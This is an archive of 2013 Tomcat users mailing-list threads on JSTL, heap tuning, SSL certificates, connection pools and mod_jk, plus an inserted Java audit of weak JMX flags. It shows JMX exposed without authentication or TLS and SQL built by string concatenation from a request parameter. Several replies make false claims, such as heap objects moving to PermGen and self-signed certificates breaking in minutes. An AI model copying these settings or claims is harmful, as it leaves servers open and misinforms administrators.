 request from a session) from the HttpSessionListener.
 Background, I want to count sessions by top level domains. I'm doing it now
 in a combination of filter and listener. Filter for new sessions, putting a
 mark for already counted sessions, and listener for destroyed session.
 However, I would like to get rid of the Filter, if it's possible somehow.
 For that, I need to get the user's IP address somehow.
 
 thanks in advance
 Leon
  

RE: JSTL XML Basic Question

2013-04-21 Thread Martin Gainty
Jerry

You'll need the core taglib and the xml taglib, e.g. 
http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm

declaration:
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<%@ taglib prefix="x" uri="http://java.sun.com/jsp/jstl/xml" %>

use core taglib to set var:
<c:set var="xmltext">
  <books>
    <book>
      <name>Padam History</name>
      <author>ZARA</author>
      <price>100</price>
    </book>
    <book>
      <name>Great Mistry</name>
      <author>NUHA</author>
      <price>2000</price>
    </book>
  </books>
</c:set>

use xml taglib to parse var:
<x:parse xml="${xmltext}" var="output"/>

use xml taglib to output the parsed text:
<x:out select="$output/books/book[1]/name" />

Martin

  Date: Sat, 20 Apr 2013 13:14:21 -0500
 Subject: JSTL XML Basic Question
 From: 2ndgenfi...@gmail.com
 To: users@tomcat.apache.org
 
 I have been searching for several hours for a basic JSTL answer with no
 luck.  From what I can tell, JSTL is under the umbrella of Tomcat.
 Hopefully someone can help me out.
 
 I simply want to use an existing already-parsed DOM (org.w3c.dom.Document
 variable) with JSTL XML tags.  In other words, I want to skip the x:parse
 step and just tell x:out and all of the other x tags to pull data from my
 pre-existing pre-parsed DOM:
 
Document myDOM;  // already built by another part of the code
 
 I understand basic xpath stuff.  But I'm not sure how to tell it to use a
 standard local java variable for the DOM.
 
 I've tried   <x:out select="$myDOM/a/b"/>  and
 <x:out select="${myDOM}/a/b"/>
 
 Both give me errors that seem to say it doesn't find a DOM.
 
 Every example I can find always assumes I want to start with a true
 non-parsed XML document.
 
 I'm sure I'm missing something obvious.  But can someone please help me out
 with the correct syntax?
 
 Thanks.
 
 Jerry
  

RE: RE : Tomcat 6.0.35 Crashed again

2013-04-11 Thread Martin Gainty
You need to take a look at the loaded JSF webapps and find out
who is acquiring a resource and not closing the resource
who is acquiring large amounts of heap and not releasing
Be aware any reference to any object in another class gives the class the 
right to be placed into PermGen
Hibernate with cglib proxies are notorious memory hogs; watch your PermGen get 
pegged when Hibernate and cglib proxies are loaded
Statics are another set of culprits of heap usage 
Remember all long lived heap objects are eventually placed into Permgen 
Find the tools to track eden heap, tenured heap and PermGen 
http://www.integratingstuff.com/2011/07/24/understanding-and-avoiding-the-java-permgen-space-error/
Get familiar with taking heap dumps with jmap and analyzing with jhat
http://javarevisited.blogspot.com/2011/05/java-heap-space-memory-size-jvm.html
 Martin 


  Date: Thu, 11 Apr 2013 11:40:46 -0400
 Subject: Re: RE : Tomcat 6.0.35 Crashed again
 From: smithh032...@gmail.com
 To: users@tomcat.apache.org
 
 On Thu, Apr 11, 2013 at 10:41 AM, Mark H. Wood mw...@iupui.edu wrote:
 
  Really, no one else can tell you what settings to use.  The best we
  can hope for is some accepted rules of thumb *as starting points* for
  further tuning.
 
 
 +1 to Dan, Neven, and Mark's responses. Please consider-or-do 'everything'
 that they mentioned/recommended.
 
 I did want to share my java settings for my
 currently-considered-a-low-scale JSF web app running on Windows Server 2008
 R2 64bit server with 32GB RAM.
 
 -XX:HeapDumpPath=D:\apache-tomee-plus-1.6.0-SNAPSHOT\temp
 -XX:+HeapDumpOnOutOfMemoryError
 -Djava.awt.headless=true
 -Dcom.sun.management.jmxremote.port=422
 -Dcom.sun.management.jmxremote.ssl=false
 -Dcom.sun.management.jmxremote.authenticate=false
 -Xms1024m
 -Xmx1024m
 -XX:MaxPermSize=384m
 -XX:+UseTLAB
 -XX:+UseConcMarkSweepGC
 -XX:+CMSClassUnloadingEnabled
 
 I am very pleased with the GC performance of my app, and I do like to
 monitor the performance of the app via JMX remote connection via Java
 Visual VM. My app runs between 200m to 500m, but I am keeping Xms/Xmx=1024m
 just to see if I ever get an OOME; so far, so good (never experienced an
 OOME), but recently, I did experience some unexpected/unwanted behavior
 with one of my @Schedule processes which was attempting to sync some data
 from database to/with Google Calendar, and google Calendar service returned
 google calendar error 503, and I recognized that the memory got up to 500m,
 and the google calendar error 503 did not resolve itself over an hour
 (@Schedule executes every 2 to 4 minutes, if error occurs, then data is
 appended to the queue for later retry attempt). I have never seen that behavior
 and I don't know if I will see it again; I wish I would have done a 'heap
 dump' instead of a 'stop' tomee/tomcat. Every day, I listen and read these
 questions/responses on tomcat list, and I can't believe that I forgot to do
 a 'heap dump'. :(
 
 Also, please note that I occasionally stop-deploy-and-start tomee/tomcat
 almost-on-a-daily-basis to deploy new app-or-configuration-or-library
 updates; also, the app or tomee (or tomcat) seem to accumulate threadlocals
 over time, and if uptime is > 1 day, then I 'think' I see that memory is
 not released, and I think eventually as uptime increases, then the
 app/tomee/tomcat will result in OOME. :)
 
 At any rate, hope this helps.
 
 Howard
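
Added example, not part of the original thread: the JVM options quoted above open remote JMX on port 422 with authenticate=false and ssl=false, so the management interface is reachable without credentials or transport protection by anything that can connect to that port. The Java audit below (Java 8 or later) parses a JVM argument list and reports weak com.sun.management.jmxremote settings; the first sample is copied from the message above, while the hardened list, its placeholder file paths, the severity labels and the class name JmxFlagAudit are assumptions.

```java
import java.lang.management.ManagementFactory;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class JmxFlagAudit {

    private static final String PREFIX = "-Dcom.sun.management.jmxremote";

    /** Extracts com.sun.management.jmxremote[.key][=value] options; key "" is the bare flag. */
    static Map<String, String> jmxOptions(List<String> jvmArgs) {
        Map<String, String> opts = new LinkedHashMap<>();
        for (String arg : jvmArgs) {
            if (!arg.startsWith(PREFIX)) {
                continue;
            }
            String rest = arg.substring(PREFIX.length());
            if (!rest.isEmpty() && rest.charAt(0) != '.' && rest.charAt(0) != '=') {
                continue;   // a different property that merely shares the prefix
            }
            int eq = rest.indexOf('=');
            String key = eq < 0 ? rest : rest.substring(0, eq);
            String value = eq < 0 ? "" : rest.substring(eq + 1);
            opts.put(key.startsWith(".") ? key.substring(1) : key, value.trim());
        }
        return opts;
    }

    /** Returns one finding per weak remote-JMX setting; empty if no remote port is set. */
    static List<String> audit(List<String> jvmArgs) {
        Map<String, String> o = jmxOptions(jvmArgs);
        List<String> findings = new ArrayList<>();
        if (!o.containsKey("port")) {
            return findings;   // no remote connector requested
        }
        String port = o.get("port");
        // authenticate and ssl default to true once a port is set. The audit is
        // conservative: any explicit value other than "true" counts as disabled.
        boolean auth = Boolean.parseBoolean(o.getOrDefault("authenticate", "true"));
        boolean ssl = Boolean.parseBoolean(o.getOrDefault("ssl", "true"));

        if (!auth) {
            findings.add("HIGH   port " + port + ": authenticate is off, any host that can "
                    + "connect gets full MBean access without credentials");
        } else {
            if (!o.containsKey("password.file")) {
                findings.add("INFO   port " + port + ": no password.file given, the JRE default "
                        + "file is used; check that it exists and is readable by the owner only");
            }
            if (!o.containsKey("access.file")) {
                findings.add("INFO   port " + port + ": no access.file given, review the default "
                        + "role-to-permission mapping");
            }
        }
        if (!ssl) {
            findings.add("MEDIUM port " + port + ": ssl is off, credentials and management "
                    + "traffic cross the network in cleartext");
        } else if (!Boolean.parseBoolean(o.getOrDefault("registry.ssl", "false"))) {
            findings.add("LOW    port " + port + ": registry.ssl is not enabled, the RMI "
                    + "registry lookup is not TLS-protected");
        }
        return findings;
    }

    private static void report(String label, List<String> jvmArgs) {
        List<String> findings = audit(jvmArgs);
        System.out.println(label + ": " + findings.size() + " finding(s)");
        for (String f : findings) {
            System.out.println("  " + f);
        }
    }

    public static void main(String[] args) {
        // JMX-related options as posted in the message above.
        List<String> posted = Arrays.asList(
                "-Djava.awt.headless=true",
                "-Dcom.sun.management.jmxremote.port=422",
                "-Dcom.sun.management.jmxremote.ssl=false",
                "-Dcom.sun.management.jmxremote.authenticate=false",
                "-Xms1024m", "-Xmx1024m");
        // Constructed counterpart; the file paths are placeholders.
        List<String> hardened = Arrays.asList(
                "-Dcom.sun.management.jmxremote.port=422",
                "-Dcom.sun.management.jmxremote.authenticate=true",
                "-Dcom.sun.management.jmxremote.password.file=<path-to>/jmxremote.password",
                "-Dcom.sun.management.jmxremote.access.file=<path-to>/jmxremote.access",
                "-Dcom.sun.management.jmxremote.ssl=true",
                "-Dcom.sun.management.jmxremote.registry.ssl=true");
        report("posted settings", posted);
        report("hardened settings", hardened);
        // The same check against the JVM this program is running in.
        report("this JVM", ManagementFactory.getRuntimeMXBean().getInputArguments());
    }
}
```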
  

RE: Better SSL connector setup

2013-04-08 Thread Martin Gainty
Identification of keys and supported ciphers are important for Key Exchange.
But before that happens, the certificate's attributes are the only means by 
which the CA-Authority can verify the name in the cert.
The certificate attributes should contain
1) 1 and only 1 Hostname to contact
2) Identification information from a DN in LDAP or a suitably unique Name 
Service Server (ADS) allowing verification of client to a 'Name Service'
http://docs.oracle.com/cd/E19575-01/820-3885/gimog/index.html

Allowing your cert to authenticate to n hosts invites 2n as many potential DOS 
attacks.
Not requiring DN would negate the CA-Authority's ability to verify DN CN == 
SSL-Host.
Think of online banking and clients' need to circumvent forged sites as 'The 
official bank site' to send your money.
If you are FE with Apache you will want to configure mod-ssl
http://www.modssl.org/

Martin 


  Date: Sun, 7 Apr 2013 11:40:24 -0700
 From: its_toas...@yahoo.com
 To: users@tomcat.apache.org
 Subject: Re: Better SSL connector setup
 
 Some notes from October 2011 referenced below:
 
 On 4/7/2013 8:47 AM, Christopher Schultz wrote:
 
  Kevin,
 
  On 4/6/13 10:10 PM, Kevin Jenkins wrote:
  I have a server that has two hosts: First:
  http://masterserver2.raknet.com/
 
  Second (using alias) https://lobby3.raknet.com
  https://milestone.lobby3.raknet.com:444/
  https://milestone.lobby3.raknet.com:444/
 
  I would like have access be on these specific URLS. Right now you
  can use untrusted URLs, such as https://masterserver2.raknet.com/
  https://milestone.lobby3.raknet.com/
 
  Additionally, I would like to access milestone.lobby3.raknet.com on
  port 443 rather than 444 (so that 443 does not display a warning
  like it does now).
 
  I setup two connectors because I did not know how else to specify
  there are two ssl certificate files
 
  If you want two separate hostnames served under HTTPS and you:
 
  a. Don't have a wildcard or other special type of certificate
  or
  b. Don't have Server Name Indication capabilities
 
 
  From the list archives:
 
 http://mail-archives.apache.org/mod_mbox/tomcat-users/201110.mbox/%3c1318710394.66976.yahoomail...@web125511.mail.ne1.yahoo.com%3E
 
 Wildcard certificates would work in this case because the hosts are part 
 of the same domain.
 
 SNI is apparently client-side only for Java.
 
  ...then you will need to configure a Connector for each hostname on
  a separate interface/port combination with separate certificates.
 
  The easiest way to do this is to set up a second interface with a
  separate IP address. This is usually trivial to do, and it doesn't
  really interfere with networking on the server. Just create a second
  interface with a second IP address, map DNS properly, and then set up
  your web server to bind specifically to the second IP address for the
  second hostname's SSL virtual host.
 
 
 In a Tomcat-only setup this is the way to go. Secondary or virtual IP 
 addresses are easy to set up.
 
  Your Connectors look just fine (other than the use of port 444, of
  course). Once you have a second interface/IP, you'll want to use the
  address attribute of the Connector to choose the interface to
  listen on. I would choose one Connector to listen on *all*
  interfaces to be a catch-all in case your IP address(es) change(s) and
  you forget to re-configure everything: a security warning due to a
  mismatched-host is better for users than an unreachable host.
 
  - -chris
 
 The other solution is to front the Tomcat systems with an Apache HTTPD 
 server and use named virtual hosts in SSL. Apparently the configuration 
 checking routine throws a warning on startup, but the actual 
 configuration works (on Apache HTTPD 2.2, I've not tried 2.4).
 
 . . . . just my two cents.
 /mde/
 
 
  

RE: IIS and Tomcat workers groups

2013-04-04 Thread Martin Gainty
The only way I know how is to have IIS route all requests to a Proxy (such as 
Squid)

http://wiki.squid-cache.org/Features/Redirectors

The Proxy Server (Squid) can redirect to LB all  requests for GroupNode1 and 
GroupNode2 

Kind regards from the USA

Martin 

__ 
Please do not alter or interrupt this communication. Thank you.


 Date: Thu, 4 Apr 2013 10:14:50 +0100
 From: miguel_3_gonza...@yahoo.es
 Subject: IIS and Tomcat workers groups
 To: users@tomcat.apache.org
 
 Dear all,
  
   We currently have an IIS 6 fronting several Tomcat 6 containers with a list 
 of workers for each redirection we want to forward from IIS to each tomcat. 
  
   We are thinking of migrating to IIS 7.5 and Tomcat 7. Also we would like 
 that two of the nodes share the same redirection and so we can balance the 
 load to two servers instead of having one server.   Is it possible that two 
 of the nodes are balanced in a group while the other nodes are stand-alone?
  
   Many thanks
  
   Miguel
  

RE: Analyzing Connection Pool Errors/Leaks

2013-04-02 Thread Martin Gainty
Never met GK but there are a few things that he needs to implement to make 
Hibernate Production-Ready

1)Deprecate the home-made bag classes ..collection classes have been out for 
the better part of 5 years ..and force the op
to upgrade their JDK to AT LEAST 1.5 to use ArrayListBagClass..Bag classes 
add unnecessary load and overhead
and any overhead is bad
 
2)Close your LRU ResultSets

3)Close your LRU StatementHandles

4)Close your LRU Cursors

5)Close your LRU Connections

6)Allow hinting..I don't want Any Hibernate query to do FTS when there is a 
perfectly good index waiting to be used

Why the rant: 1 1/2 years ago I visited a high-profile client that was 
processing a million transactions a day and Hibernate was 
mucking the process so intrusively the client said rewrite 1000_ Hibernate 
calls to straight queries
 
to quote a Cambridge Maven..Hibernate is more trouble than it's worth

My 2 cents


Martin Gainty 

  


 Subject: Re: Analyzing Connection Pool Errors/Leaks
 From: dmik...@vmware.com
 Date: Mon, 1 Apr 2013 17:11:50 -0400
 To: users@tomcat.apache.org
 
 On Apr 1, 2013, at 4:18 PM, David Landis wrote:
 
  Thanks for the response, see my comments inline below.
  
  
  On Mon, Apr 1, 2013 at 3:49 PM, Daniel Mikusa dmik...@vmware.com wrote:
  
  On Apr 1, 2013, at 3:31 PM, David Landis wrote:
  
  Hi guys,
  
  When running a performance test on my system it starts fine, but after a
  while I start getting errors in my application log such as (see the
  bottom
  for full stack trace):
  
  2013-03-29 16:38:54,778 ERROR
  [org.hibernate.engine.jdbc.spi.SqlExceptionHelper] -
  [SimpleAsyncTaskExecutor-12842] - [SimpleAsyncTaskExecutor-12842]
  Timeout:
  Pool empty. Unable to fetch a connection in 30 seconds, none
  available[size:80; busy:0; idle:0; lastwait:3].
  
  This means you have no connections in your pool and it's unable to create
  a new connection to your database.
  
  
  
  OK, I'll have to investigate the DB setting more thoroughly. The maximum
  sessions and processes in Oracle are higher than we were using for the test
  though (several hundred).
  
  
  
  
  
  Questions:
  
  1.) I'm a little confused about what it means if no connections are
  available and yet none are busy nor idle. What are the other
  available
  states?
  
  The pool is empty. Furthermore, the error above means that it can't
  create a new connection either. Maybe your network failed? or the DB
  kicked off all your application's connections?
  
  
  
  Actually Oracle was showing 70+ inactive sessions for my app even though
  the connection pool was showing empty.
 
 Possible you are hitting a bug.
 
 You might also want to try an upgrade of Tomcat. You're a couple versions 
 back at 7.0.32. You can see what was fixed by searching for jdbc-pool in 
 the ChangeLog.
 
 https://tomcat.apache.org/tomcat-7.0-doc/changelog.html
 
 Dan
 
 
  
  
  Were you ever able to get a connection to the DB? If you restart Tomcat,
  can you get connections to the DB again?
  
  
  
  Yes, restarting Tomcat results in a fresh pool of DB connections and the
  70+ inactive sessions on the DB side are gone and replaced by 10 which is
  the initial size of the pool.
  
  
  
  
  Also, are there any limits on your DB user's account that might cause
  problems with your performance tests?
  
  
  
  Not that I know of, but I'll look further. I was expecting problems with
  the perf test eventually b/c it was set to simulate a couple hundred users
  and I only have maxActive set to 80. That is fine. I'm more concerned with why
  the connection pool didn't eventually recover.
  
  
  
  
  
  2.) My other point of confusion is that assuming there is a connection
  leak
  in the application, shouldn't setting removeAbandoned=true cause the DB
  connections to eventually be recovered?
  
  Yes.
  
  What I am seeing is that even after
  a couple days of no application usage now I'm still getting

RE: OCSP with TOMCAT 7

2013-03-21 Thread Martin Gainty
so you want Tomcat7 to act as an OCSP Responder?
 
download and install ocsp daemon ..this is not trivial as you will need to be 
able to communicate to a working LDAP server
http://www.openca.org/projects/ocspd/

configure your servlet to serve its requests to ocsp-daemon calls..
configure the servlet to serve the response with the results from the 
ocsp-daemon

Please explain why you want to FE the ocspd request instead of calling the 
daemon directly?

Martin 
__ 
Disclaimer and confidentiality note

This message is confidential. If you are not the intended recipient, we kindly 
ask that you notify us. Any unauthorized forwarding or making of a copy is not 
permitted. This message serves only for the exchange of information and has no 
legally binding effect. Because e-mails can easily be manipulated, we cannot 
accept any liability for the content.
This message is confidential and may be privileged. If you are not the 
intended recipient, we kindly ask that you inform the sender. Any unauthorized 
distribution or copying of this message is prohibited. This message is for 
information only and shall not have any legally binding effect. Given that 
e-mails can easily be subject to manipulation, we cannot accept any 
responsibility for the content provided.

  


 Date: Thu, 21 Mar 2013 10:08:08 +0100
 From: a...@ice-sa.com
 To: users@tomcat.apache.org
 Subject: Re: OCSP with TOMCAT 7
 
 Amit A wrote:
  Could not find anything archived on this topic
  Search query: http://marc.info/?l=tomcat-user&w=2&r=1&s=tomcat+ocsp&q=t
  
  Further pointers please?
 
 15/03/2013, subject Standard or OCSP Native Lib?, Nick Williams ?
 
  
  
  On Wed, Mar 20, 2013 at 4:23 PM, André Warnier a...@ice-sa.com wrote:
  
  Amit A wrote:
 
  I need to enable OCSP on my application which is running Tomcat 7.0.29.
  Looked up the documentation but did not find quite much :
  http://tomcat.apache.org/tomcat-7.0-doc/ssl-howto.html
 
  1. Is OCSP with just tomcat actually possible? Do we need a external
  module/software?
  2. Has anyone implemented/Configured OCSP with Tomcat? I am looking for
  the
  nitty gritties here.
 
 
  Search the list archives. There was a question/response about this
  exact subject just a few days ago.
 
 
  -
  To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  
 
 
 
  

RE: SSL Best Practices

2013-03-19 Thread Martin Gainty

1)Have you ever tried to coerce IE to accept a self-signed cert
2)if you purchase a pfx with a self-signed certificate sold to you by 
chris_is_a_hacker.com for 1.00 then who do you think can break it

The cert allows browser to contact the sites SSL connector..by presenting 
credentials usually from a Name Server such as ADS or LDAP

the real work involves breaking the algorithm implemented by the key

in order  to establish Key exchange on a SSLv2 transport

I sincerely doubt even chris_is_a-hacker can break any of the RSA algorithms 
implemented by the key inside a versign.pfx 
 
'Nuf Said
Martin 
__ 

  


 From: jeffrey.har...@mantech.com
 To: users@tomcat.apache.org; ch...@derham.me.uk
 Date: Tue, 19 Mar 2013 06:04:52 -0400
 Subject: RE: SSL Best Practices
 
 
 
  -Original Message-
  From: cjder...@gmail.com [mailto:cjder...@gmail.com] On Behalf Of chris
  derham
  Sent: Tuesday, March 19, 2013 1:58 AM
  To: Tomcat Users List
  Subject: Re: SSL Best Practices
 
   If the system is only for testing, or communicates with a limited
   number of systems (i.e., it is a firewalled backend system that only
   communicates with a front-end system), then again, a self-signed
  certificate would be fine.
 
  +1
 
   I do agree that if this is a public facing system, or one in an
   organization with a large number of users that does not have its own
   CA infrastructure, then a commercial certificate would be the best
  choice.
 
  Commercial certificate authorities are actively targeted by hackers,
  and when they are broken into, the trust each os has configured of such
  certificates can cause issues. The recent google ssl certificate issue
  shows what happens when things go wrong. If users will access the site
  via a browser, then the browser warning will confuse them/make them
  used to ignoring security warnings. For applications communicating with
  each other, a self signed certificate will actually be more secure than
  a certificate authority issued certificate - assuming you trust your
  internal security more than you trust that of a commercial certificate
  authority. It all depends on what the certificate will be used for.
 
  Chris
 
 
 What you say is all true, but if the public is accessing the site,
 there is no real alternative to a commercial certificate, because there will
 be no way to ascertain the trust of the site at all, and as you say users 
 will be
 confused by the browser warnings.
 
 Unfortunately, the security of the Internet is dependent on a relatively 
 handful
 of commercial certificate authorities, several of whom have either been 
 hacked,
 or who have not properly vetted requesters for certificates.
 
 Jeffrey Harris
 
 This e-mail and any attachments are intended only for the use of the 
 addressee(s) named herein and may contain proprietary information. If you are 
 not the intended recipient of this e-mail or believe that you received this 
 email in error, please take immediate action to notify the sender of the 
 apparent error by reply e-mail; permanently delete the e-mail and any 
 attachments from your computer; and do not disseminate, distribute, use, or 
 copy this message and any attachments.
 
 
  

RE: Upgrading Tomcat in the customer base

2013-03-19 Thread Martin Gainty
Patrick if client and tc-server are on same domain..how about implementing 
Windows Authentication in TC?
When client authenticates to the Domain all of the TC shares are restored 
(including TC share) 
http://tomcat.apache.org/tomcat-7.0-doc/windows-auth-howto.html

HTH
Martin
__
..place disclaimer here...

  From: pflah...@rampageinc.com
 To: users@tomcat.apache.org
 Subject: Upgrading Tomcat in the customer base
 Date: Tue, 19 Mar 2013 15:24:07 -0400
 
 Hi,
 
 We deploy tomcat in our own folder (c:\rsi_tc\tomcat) on a Windows  
 machine as a service. We use the service.bat to install
 as a service. Historically to update tomcat we would remove the  
 current version and install the new version. There is rub in all
 this which we have to change the service login to be an account that  
 can access files from a network share. Therefore when
 we upgrade tomcat, we remove the current version and install the new  
 version and then someone ( the customer :-(  ) has to
 go into the service and change the service login back to the account  
 that will give them access to the network share.
 
 I'm looking for a way (if possible) to avoid having the customer to  
 have change the service login. I'm looking for suggestions
 to make this easier and have the following questions about whether  
 some of my thoughts to make it easier are safe.
 
 1. Can I *not* uninstall the service and just replace the folder  
 structure on the file system with the new version? I have tried it
  and it seems to work but question whether or not it is safe. I  
 know if a major version changes I cannot do this as the service
  calls tomcat6.exe vs tomcat7.exe for instance and therefore would  
 have to do the complete uninstall/install.
 
 2. If I do the above does calling the service.bat install again  
 using the *newer* service.bat version make a difference? We are  
 calling it (the newer service.bat)
  and it seems to be harmless and thought that it might help in  
 case something in the batch install changed, we would get the changes.
 
 Bottom line, has anyone faced this dilemma and found a successful way  
 to upgrade a tomcat instance that uses a unique service login.
 
 Thanks for any input.
 Pat
 
 
 
   
 
 
 
  

RE: SSL Best Practices

2013-03-18 Thread Martin Gainty
Jeff

do you have keystore and certificate..if not go to verisign and get a CATrusted 
pfx...
the cost is worth it and anything you create with a self-signed cert will be 
broken in less than 5 min

Feel free to Pingback if you have any questions.
 
Martin

  


 From: jeffrey.jan...@polydyne.com
 To: users@tomcat.apache.org
 Subject: RE: SSL Best Practices
 Date: Mon, 18 Mar 2013 13:34:44 +
 
  -Original Message-
  From: Jeffrey D. Fisher [mailto:jeff.fisher12...@cox.net]
  Sent: Friday, March 15, 2013 3:03 PM
  To: users@tomcat.apache.org
  Subject: SSL Best Practices
  
  Gentlemen (Ladies):
  
  
  
  I am looking for a published best practice on editing the SERVER.XML
  configuration file to use SSL/HTTPS. The key are imported into the
  keystore.
  
  
  
  Any input is appreciated.
  
  
  
  Jeff Fisher
  
  Omaha, NE
 
 I would start by reading the Tomcat Documentation on the subject.
 It's pretty straightforward.
 Jeff
 
 
 
  

RE: Getting HttpSession from HandshakeRequest/Configurator

2013-03-17 Thread Martin Gainty
Nick
if you don't mind Comet's implementation of WebSocket events to Servlet-3.0 POST 
and GET then check out http://java.dzone.com/articles/tomcat-websockets-html5

I'll let you test drive to see if Ant's WebSocketServlet fully supports all 
aspects of the WebSocket spec http://en.wikipedia.org/wiki/WebSocket

Keep us apprised,
Happy Driving
Martin __ Place Long-winded 
disclaimer here

  From: nicho...@nicholaswilliams.net
 Subject: Getting HttpSession from HandshakeRequest/Configurator
 Date: Sun, 17 Mar 2013 17:56:23 -0500
 To: users@tomcat.apache.org
 
 Based on my reading of the WebSocket spec mailing lists and API 
 documentation, if I want to get the HttpSession that exists when a WebSocket 
 connection is negotiated I need to extend ServerEndpointConfig.Configurator, 
 override #modifyHandshake(), and call #getHttpSession() on the 
 HandshakeRequest. However, I need a little clarification, because I'm not 
 seeing how this is going to work:
 
 1) Tomcat doesn't implement HandshakeRequest ... anywhere. So I'm not even 
 seeing how that method could ever be called with a non-null argument. 
 (Admittedly, I haven't run this yet ... I'm sending this preemptively while I 
 complete my code, to go ahead and get some feedback).
 
 2) None of the arguments to #modifyHandshake() provide access to the Session. 
 So how am I supposed to do anything with it? How can I associate the 
 HttpSession with the Session?
 
  

RE: Running a binary program from a JSP

2013-03-14 Thread Martin Gainty
Hi Dan

Earlier I gave him an example of a DWR backend bean which handles the mechanics 
of Runtime.getRuntime().exec("cmd.exe /C 'fubar'");

I *was* going to suggest using an Applet but I didn't want to spend the rest of 
the month twiddling the exact permutation of execute and read permissions

Thanks for the link!
Martin Gainty 
__ 

  


 Subject: Re: Running a binary program from a JSP
 From: dmik...@vmware.com
 Date: Thu, 14 Mar 2013 08:06:06 -0400
 To: users@tomcat.apache.org
 
 On Mar 14, 2013, at 12:34 AM, Tim Gross wrote:
 
  Hi,
  
  I want to know if it is possible to execute a binary program (written in C)
  from within a JSP. 
 
 Yes.
 
  I would like to do this on the server side, not the
  browser, in Tomcat6. If it is possible, can somebody provide an example.
 
 Use...
 
 http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
 
 or
 
 http://docs.oracle.com/javase/6/docs/api/java/lang/ProcessBuilder.html
 
 Google can give you examples.
 
 Dan
 
  Sorry if I am using the wrong mailing list. Feel free to redirect me if
  that is the case.
  
  Thanks,
  
  Tim.
  
  
  
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Compiling JSPs at runtime

2013-03-09 Thread Martin Gainty
Zimmer http://www.jarfinder.com/index.php/jars/versionInfo/4589
Good luck
Martin  
__ 
 

  Date: Sat, 9 Mar 2013 14:39:23 +0100
 Subject: Compiling JSPs at runtime
 From: fb666fb...@gmail.com
 To: users@tomcat.apache.org
 
 Hello!
 
 I'm working on a WCMS system where I want to compile some view components
 at runtime. I found the Jasper howto to compile using Ant, but that's not
 what I need.
 
 I have dynamic JSP code stored in a database.
 
 Simplified I want to do something like this:
 
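 protected void doRequest(HttpServletRequest request, HttpServletResponse response)
         throws ServletException, IOException {

     // getParameter() returns a String, so parse it before using it as an id
     int templateId = Integer.parseInt(request.getParameter("templateId"));
     String jspCode = db.queryString("select jspCode from templates where id = "
             + templateId);
     Jasper jspc = new Jasper();                  // hypothetical class, as in the question
     Servlet jspServlet = jspc.compile(jspCode);  // hypothetical method, as in the question
     forward(jspServlet);

 }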
 
 For sure this is very simplified. I know that the Jasper JSPC will need
 much more configuration/environment set.
 
 Can someone point me to the right classes to start?
 
 Thanks,
 Gerd
  

RE: Tomcat does not accept connections from Safari on iPad vs an SSL connector with JSSE ciphers

2013-02-15 Thread Martin Gainty
someone put cipherSuites patch on TC 7 Connector..

*IF you are implementing TC7 Connector with cipherSuites attribute support and 
have not specified cipherSuites supported by your ppk keys*
 then yes it's Tomcat's fault

Otherwise it's not..

Ciao,

Martin Gainty 

__ 

  


 Date: Fri, 15 Feb 2013 12:36:53 -0500
 From: ch...@christopherschultz.net
 To: users@tomcat.apache.org
 Subject: Re: Tomcat does not accept connections from Safari on iPad vs an SSL 
 connector with JSSE ciphers
 
 
 Giuseppe,
 
 On 2/15/13 9:07 AM, Giuseppe Sacco wrote:
  Debugging the SSL handshake, I found that the problem is really
  about ciphers because the handshake fails with exception 
  javax.net.ssl.SSLHandshakeException: no cipher suites in common
  
  So, this is really something to be investigated in JSSE instead of 
  tomcat. I am sorry for noise in this list :-(
 
 We were pretty sure it wasn't Tomcat's fault, but we can still
 probably help.
 
  Allow legacy hello messages: true [snip] http-192.168.1.55-8443-1,
  READ: SSLv3 Handshake, length = 75 *** ClientHello, SSLv3 
  RandomCookie: GMT: 1360933724 bytes = { 203, 86, 168, 88, 75, 77,
  52, 134, 4, 76, 204, 78, 0, 160, 168, 123, 96, 78, 106, 23, 40, 47,
  219, 81, 28, 23, 174, 156 } Session ID: {} Cipher Suites:
  [TLS_EMPTY_RENEGOTIATION_INFO_SCSV, Unknown 0x0:0x3d, Unknown
  0x0:0x3c, TLS_RSA_WITH_AES_128_CBC_SHA, SSL_RSA_WITH_RC4_128_SHA,
  SSL_RSA_WITH_RC4_128_MD5, TLS_RSA_WITH_AES_256_CBC_SHA,
  SSL_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x67, Unknown 0x0:0x6b,
  TLS_DHE_RSA_WITH_AES_128_CBC_SHA, TLS_DHE_RSA_WITH_AES_256_CBC_SHA,
  SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA, Unknown 0x0:0x3b,
  SSL_RSA_WITH_NULL_SHA, SSL_RSA_WITH_NULL_MD5] Compression Methods:
  { 0 } ***
 
 So the client is doing an SSLv3 handshake. The message above about
 allowing legacy hellos seems like it should support a SSLv3
 handshake. Looking at the ciphers, your JVM (without BouncyCastle) and
 client truly have no overlap. I'm actually surprised that your JVM
 does not support any TLS_RSA_* or TLS_DHE_* ciphers. Can you re-run my
 cipher-dump program without BouncyCastle and provide the full output?
 I was a little unclear as to what you posted last time.
 
 - -chris
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: mod_jk errors errno=110 and errno=115

2013-02-14 Thread Martin Gainty
Phillipe

ajp_send_request::jk_ajp_common.c (1630):
(nodeYY) connecting to backend failed. Tomcat is probably not started or is
listening on the wrong port (errno=115)

indicate that you might have a misconfig on jk.properties ...check out host and 
port attributes here
http://tomcat.apache.org/connectors-doc/reference/workers.html
Good luck,
Martin 
__ 

  Date: Thu, 14 Feb 2013 14:17:10 +0100
 Subject: mod_jk errors errno=110 and errno=115
 From: pbo...@gmail.com
 To: users@tomcat.apache.org
 
 Hello,
 
 We have a mod_jk in version 1.2.28 with Apache 2.16  fronting a Tomcat
 server in version 6 on JDK6.
 
 We are facing long response times and timeouts from time to time.
 Mod_jk log files show the following errors:
 
 [][X] [error] ajp_connect_to_endpoint::jk_ajp_common.c
 (1035): (nodeXX) cping/cpong after connecting to the backend server failed
 (errno=110)
 [][X] [error] ajp_send_request::jk_ajp_common.c (1630):
